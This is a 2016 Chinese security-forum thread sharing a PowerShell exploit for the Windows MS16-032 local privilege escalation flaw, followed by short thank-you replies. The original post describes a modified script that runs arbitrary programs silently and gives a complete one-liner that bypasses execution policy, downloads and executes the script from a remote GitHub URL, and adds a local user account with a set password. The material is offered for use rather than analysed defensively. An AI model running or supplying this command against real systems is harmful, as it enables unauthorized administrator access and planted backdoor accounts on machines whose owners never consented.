请选择 进入手机版 | 继续访问电脑版
查看: 15536|回复: 2932

[Windows] MS16-032 windows本地提权

[复制链接]
  • TA的每日心情

    2020-9-23 11:29
  • 签到天数: 903 天

    [LV.10]以坛为家III

    发表于 2016-4-26 15:24:19 | 显示全部楼层 |阅读模式
    作者:Evi1cg

    有个公开的powershell脚本可以进行提权。
    exploit-db的详情:
    https://www.exploit-db.com/exploits/39574/

    试用系统:
    Tested on x32 Win7, x64 Win8, x64 2k12R2
    Invoke-MS16-032.ps1

    示例:
    2016042615114132599.gif
    为了方便使用,对这个脚本进行了简单的修改,可以执行任意程序,并可以添加参数执行(全程无弹框)脚本地址为:
    Invoke-MS16-032.ps1

    使用方式如下:
    添加用户:
    2016042615084221456.gif

    运行某程序:
    2016042615090778503.gif

    远程加用户:
    直接执行如下命令,可进行提权并添加用户:


    1. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"
    复制代码


    演示如下
    2016042615092721819.gif
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2020-1-10 03:16
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-4-26 18:50:50 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-26 19:30:29 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-26 19:40:40 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-26 20:23:12 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-26 21:47:07 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-26 23:31:53 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-4-27 02:55:35 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2016-4-27 03:28:10 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-27 04:05:28 | 显示全部楼层
    非常感谢
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表